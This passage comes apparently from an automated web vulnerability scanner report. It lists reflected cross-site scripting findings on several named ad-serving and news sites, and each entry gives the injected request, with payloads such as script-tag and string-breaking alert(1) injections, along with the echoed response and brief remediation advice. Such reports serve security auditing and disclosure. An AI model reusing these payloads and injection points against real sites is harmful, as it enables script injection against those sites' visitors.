GET /ad/js/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3">
...[SNIP]...

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cce6'%3balert(1)//bd0628ff781 was submitted in the mpvc parameter. This input was echoed as 1cce6';alert(1)//bd0628ff781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6'%3balert(1)//bd0628ff781 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:25 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6';alert(1)//bd0628ff781http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77daa'%3balert(1)//71eb06d6eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77daa';alert(1)//71eb06d6eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa'%3balert(1)//71eb06d6eab=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 5:34:24 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 420
Date: Thu, 05 May 2011 01:00:26 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa';alert(1)//71eb06d6eab=1http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a09e'-alert(1)-'fb0851aaf65 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:17:54 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 631
Date: Thu, 05 May 2011 01:00:19 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:6
...[SNIP]...
52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65">
...[SNIP]...

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e9d9'%3balert(1)//9b1f5b87858 was submitted in the mpvc parameter. This input was echoed as 3e9d9';alert(1)//9b1f5b87858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9'%3balert(1)//9b1f5b87858 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:34:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 630
Date: Thu, 05 May 2011 01:00:21 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9';alert(1)//9b1f5b87858http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41e2'%3balert(1)//ab4d8722cb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e2';alert(1)//ab4d8722cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2'%3balert(1)//ab4d8722cb9=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:39:09 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 633
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2';alert(1)//ab4d8722cb9=1http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16ea"><script>alert(1)</script>3359d04778d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f16ea"><script>alert(1)</script>3359d04778d=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044482-New%7C1367647044482%3B%20s_nrgvo%3DNew%7C1367647044484%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_cc=true; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105579

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<meta property="og:url" content="http://www.sportingnews.com/?f16ea"><script>alert(1)</script>3359d04778d=1" />
...[SNIP]...

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /iframe-widgets/feed/accordion.php

Issue detail

The value of the body-class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f8b"><script>alert(1)</script>775d746b45d was submitted in the body-class parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=homepage20f8b"><script>alert(1)</script>775d746b45d HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10973

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="homepage20f8b"><script>alert(1)</script>775d746b45d">
...[SNIP]...

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /iframe-widgets/feed/accordion.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c506"><script>alert(1)</script>03731420e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=home/7c506"><script>alert(1)</script>03731420e7cpage HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10974

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="home/7c506"><script>alert(1)</script>03731420e7cpage">
...[SNIP]...

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the HTML document as plain text between tags. The payload 39601<script>alert(1)</script>ba982c7c28d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15039601<script>alert(1)</script>ba982c7c28d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=283
Date: Thu, 05 May 2011 00:59:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4829

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-size:11px; color:#000; }
#fs { display:block; width:180px; height:15039601<script>alert(1)</script>ba982c7c28dpx; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15039601<script>
...[SNIP]...

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e5"><script>alert(1)</script>0234b75261d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150aa9e5"><script>alert(1)</script>0234b75261d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 00:59:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4851

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<div id="fs" class="ad-180x150aa9e5"><script>alert(1)</script>0234b75261d">
...[SNIP]...

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68bb"><script>alert(1)</script>17755f1e103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b68bb"><script>alert(1)</script>17755f1e103=1 HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: Ym9uZXM=
Cache-Control: private
